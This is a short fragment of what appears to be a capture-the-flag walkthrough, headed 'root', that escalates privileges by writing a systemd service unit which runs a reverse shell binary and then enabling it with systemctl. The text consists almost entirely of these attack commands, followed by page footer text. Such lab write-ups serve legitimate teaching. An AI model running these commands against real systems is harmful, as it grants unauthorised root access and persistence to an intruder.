root

cat /tmp/rev > shell
chmod +x shell
echo '[Service]
Type=oneshot
ExecStart=/home/pepper/shell
[Install]
WantedBy=multi-user.target' > adot8.service
/bin/systemctl enable --now /home/pepper/adot8.service
/bin/systemctl start adot8.service


Last updated
Was this helpful?